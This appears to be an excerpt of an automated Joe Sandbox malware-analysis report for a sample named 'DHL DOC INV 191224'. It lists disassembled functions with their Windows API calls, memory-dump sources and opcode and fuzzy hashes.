                                                                                                                        • Opcode ID: 4a7e274542595e6cc300e918bfbc01b8c5e7437813a8b9f5ffb9f72a5a71363b
                                                                                                                        • Instruction ID: c4635529b6e2cdfe5eab2eb93f124e35ee15b94bbdbf3a06372a1541eb54aacc
                                                                                                                        • Opcode Fuzzy Hash: 4a7e274542595e6cc300e918bfbc01b8c5e7437813a8b9f5ffb9f72a5a71363b
                                                                                                                        • Instruction Fuzzy Hash: CDF05E36041268FADB135F94AC09FDE3F59AF06310F048004FA55A50E1CB756A11CFE9
                                                                                                                        Function 003498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 003498CC
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 003498D6
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 003498E9
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 003498F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4037423528-0
                                                                                                                        • Opcode ID: 7a4ceab6c93740830a59c4330dd302ba02eba5efd39777b72af06f0c10142fb0
                                                                                                                        • Instruction ID: 1602d3f96f555994c33ed479ab6d63a595f11100d71a4992173ab72c8c19eded
                                                                                                                        • Opcode Fuzzy Hash: 7a4ceab6c93740830a59c4330dd302ba02eba5efd39777b72af06f0c10142fb0
                                                                                                                        • Instruction Fuzzy Hash: 46E06531654240AEDB225B75BC09FE93F55AB12335F188219F6FDD80E1C372A6419B10
                                                                                                                        Function 0039162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00391634
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039163B
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003911D9), ref: 00391648
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039164F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974789173-0
                                                                                                                        • Opcode ID: 69d46a8ea7b9445362c2006999601dff4cd2a7fdabfc8de4ef4d241e5b69fa2e
                                                                                                                        • Instruction ID: e31dfa392617f8b737990959dd59213d9db59ad25e25368c7372dde19b3fabf5
                                                                                                                        • Opcode Fuzzy Hash: 69d46a8ea7b9445362c2006999601dff4cd2a7fdabfc8de4ef4d241e5b69fa2e
                                                                                                                        • Instruction Fuzzy Hash: C0E08671A11221DBDB211FA0AD0DF463B7CBF44791F194808F649D9080D6389441C750
                                                                                                                        Function 0038D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 0038D858
                                                                                                                        • GetDC.USER32(00000000), ref: 0038D862
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
                                                                                                                        • ReleaseDC.USER32(?), ref: 0038D8A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 924f930554e65b59c789f680c44526dd9978d01b3f40e4db6d68c325a12020e5
                                                                                                                        • Instruction ID: b512835d961f1024dd04219318f288311399d7c6afda3a234cb1257bdaa75af2
                                                                                                                        • Opcode Fuzzy Hash: 924f930554e65b59c789f680c44526dd9978d01b3f40e4db6d68c325a12020e5
                                                                                                                        • Instruction Fuzzy Hash: BBE01AB4810204DFCB42AFA0D90CA6DBBB9FB08310F18A049E84AE7250C738A912EF40
                                                                                                                        Function 0038D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 0038D86C
                                                                                                                        • GetDC.USER32(00000000), ref: 0038D876
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
                                                                                                                        • ReleaseDC.USER32(?), ref: 0038D8A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 224b12c99a0f14cbf6e46fd2c74af0a19bfdc492c6d781d599bb14e6b13b5d8c
                                                                                                                        • Instruction ID: 4baefee4fa827a2eca2d26550109121cea67b1446aed8ba2e54bbfadbabc3e16
                                                                                                                        • Opcode Fuzzy Hash: 224b12c99a0f14cbf6e46fd2c74af0a19bfdc492c6d781d599bb14e6b13b5d8c
                                                                                                                        • Instruction Fuzzy Hash: 6CE09A75810204DFCB52AFA0D94CA6DBBB9BB08311F18A449E94AE7250C739A912DF50
                                                                                                                        Function 003A4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003A4ED4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection_wcslen
                                                                                                                        • String ID: *$LPT
                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                        • Opcode ID: 95b010d0fc339d84e1f8c0630d9f7fdd8630e3d7136955f0f8d7dbba29a3c06a
                                                                                                                        • Instruction ID: 426641172b707f2575c2e3259d35a0100973cc054898e384091aa8643bb4e4fd
                                                                                                                        • Opcode Fuzzy Hash: 95b010d0fc339d84e1f8c0630d9f7fdd8630e3d7136955f0f8d7dbba29a3c06a
                                                                                                                        • Instruction Fuzzy Hash: 8B917D75A002049FDB16DF58C484EAABBF5FF86304F198099E80A9F362C775ED85CB90
                                                                                                                        Function 0035E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0035E30D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                        • String ID: pow
                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                        • Opcode ID: ec5336b8bb972e6e02f0ca75f492fa8dc05955ae123bbd4ab28891827e4189c8
                                                                                                                        • Instruction ID: 8a561822a34d30d42f8df239435172c5c57654bfd2ec9d4dd22372b146e54251
                                                                                                                        • Opcode Fuzzy Hash: ec5336b8bb972e6e02f0ca75f492fa8dc05955ae123bbd4ab28891827e4189c8
                                                                                                                        • Instruction Fuzzy Hash: CA51CE61A0C20196CB1B7714CD01B7A3BACEB10746F70CDA9E8D2462FCEB318DDD9A46
                                                                                                                        Function 003B7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,?,00000000,00000000), ref: 003B78DD
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,00000000,?,00000000,00000000), ref: 003B783B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper$_wcslen
                                                                                                                        • String ID: <s?
                                                                                                                        • API String ID: 3544283678-1615119086
                                                                                                                        • Opcode ID: 2f03efe89a06f2397cd25e5a7ea83f4392b5ad96c2694221a113aa54496fa84c
                                                                                                                        • Instruction ID: 7e7d055f2aa427503f5f8219f8423a7f55be55b80a1b5193f5c8619542702fb6
                                                                                                                        • Opcode Fuzzy Hash: 2f03efe89a06f2397cd25e5a7ea83f4392b5ad96c2694221a113aa54496fa84c
                                                                                                                        • Instruction Fuzzy Hash: 8A613C76914119AACF07EBA4CC92DFDB378FF54704F44412AE642BB491EF306A09DBA0
                                                                                                                        Function 0034E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #
                                                                                                                        • API String ID: 0-1885708031
                                                                                                                        • Opcode ID: 9a616a40c68ed6e09e191de43ccd010bdd8997989e4410bd2a84b1fb2cd87089
                                                                                                                        • Instruction ID: 9381c54f57cc7bbdb4fe4b9204985b05ee44665c1b5e88cd87a023159f2804dd
                                                                                                                        • Opcode Fuzzy Hash: 9a616a40c68ed6e09e191de43ccd010bdd8997989e4410bd2a84b1fb2cd87089
                                                                                                                        • Instruction Fuzzy Hash: C6510D35A04346DFDB17EF28C481ABA7BA8FF55310F248599F8919F2D0D674AD42CBA0
                                                                                                                        Function 0034F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0034F2A2
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0034F2BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: 622a5b5041c37e36ffc7662c546b77dedcd5f81597604f64d9a4ab232acc4c1c
                                                                                                                        • Instruction ID: ddfc89ae0779a43aafa48bce5756ef524f63a4b5f91c4a71e7486ebd78214013
                                                                                                                        • Opcode Fuzzy Hash: 622a5b5041c37e36ffc7662c546b77dedcd5f81597604f64d9a4ab232acc4c1c
                                                                                                                        • Instruction Fuzzy Hash: C55155724187489BD321AF10DC86BAFBBFCFB84304F81884CF1D9551A5EB309929CB66
                                                                                                                        Function 003B5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003B57E0
                                                                                                                        • _wcslen.LIBCMT ref: 003B57EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                        • Opcode ID: c691def72b406eb528660b15aa68b02d2b4598124471a3b3f49ce497c294f679
                                                                                                                        • Instruction ID: 36e997e9a80ea81184a62703b7189bac12b83c348dbfa312b99e870cd847370e
                                                                                                                        • Opcode Fuzzy Hash: c691def72b406eb528660b15aa68b02d2b4598124471a3b3f49ce497c294f679
                                                                                                                        • Instruction Fuzzy Hash: B5419F31A002099FCB16DFA9C882AFEBBF5FF59324F154069E605EB251E7309D81CB90
                                                                                                                        Function 003AD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 003AD130
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003AD13A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                        • String ID: |
                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                        • Opcode ID: d20a387d55f88d3daa71a3fb3a2b2d26dce74a59609bef02674afc0d9bf0a5f8
                                                                                                                        • Instruction ID: bc4f7290c3284479d90da3acf9d19b93762fde2ce5fff4923e66ca5027055a47
                                                                                                                        • Opcode Fuzzy Hash: d20a387d55f88d3daa71a3fb3a2b2d26dce74a59609bef02674afc0d9bf0a5f8
                                                                                                                        • Instruction Fuzzy Hash: 79311A71D00209AFCF16EFA4CD85AEEBFB9FF09300F004019F815AA162D735AA46CB90
                                                                                                                        Function 003C356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 003C3621
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C365C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                        • Opcode ID: 08aacfb58fda397b29959792b533b44ab5e82711ac3bfb6caa30d1e3ec1fc537
                                                                                                                        • Instruction ID: 5aa879ff08f4e3a94ed824963f3a46f977d6773227ac1083a05962ab0df11307
                                                                                                                        • Opcode Fuzzy Hash: 08aacfb58fda397b29959792b533b44ab5e82711ac3bfb6caa30d1e3ec1fc537
                                                                                                                        • Instruction Fuzzy Hash: AC31AA71110204AEDB129F68CC81FFB73A9FF88720F01961DF8A9D7280DA35AD91CB60
                                                                                                                        Function 003497C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        • GetParent.USER32(?), ref: 003873A3
                                                                                                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0038742D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$ParentProc
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 2181805148-2513823414
                                                                                                                        • Opcode ID: f68fd33b51c18fd742b62404672efee8170488294c302e1707535025af8bbfcc
                                                                                                                        • Instruction ID: d20aa0172cef02742114df3d22983ff8d88cf448391e7a68de7e26644fa1c4f7
                                                                                                                        • Opcode Fuzzy Hash: f68fd33b51c18fd742b62404672efee8170488294c302e1707535025af8bbfcc
                                                                                                                        • Instruction Fuzzy Hash: 6521B134604204AFCB27AF2DCC49EAA3BD6EF4A360F254296F9255F2B1C371AD51E741
                                                                                                                        Function 003C31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C327C
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C3287
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: Combobox
                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                        • Opcode ID: fcc98305ec75322e6aa82acf8f717d4556e491fdbc85bb52afb42090d5f64089
                                                                                                                        • Instruction ID: eb1cc43a44d0f9ecd4d586f8da7da1e875717be558ce1f6e9b264a5766427801
                                                                                                                        • Opcode Fuzzy Hash: fcc98305ec75322e6aa82acf8f717d4556e491fdbc85bb52afb42090d5f64089
                                                                                                                        • Instruction Fuzzy Hash: F711B2713002087FEF269F54DC81FBB776EEB94364F118529F918DB290D671AD518760
                                                                                                                        Function 003C32A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMenuPopup
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3826294624-2513823414
                                                                                                                        • Opcode ID: c9d9ad09bb1d75997874a4265de691ce24ecfb59ba9befb4e0ff8de0bb445959
                                                                                                                        • Instruction ID: b75576ff84d63228cc6eac258751d405d30530fb5fe21e31fe23c7a6f0a86814
                                                                                                                        • Opcode Fuzzy Hash: c9d9ad09bb1d75997874a4265de691ce24ecfb59ba9befb4e0ff8de0bb445959
                                                                                                                        • Instruction Fuzzy Hash: 462139786056049FCB22CF28C445F96B7E5FB0E365F09846AE899DB361D331AE02CF55
                                                                                                                        Function 003C3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
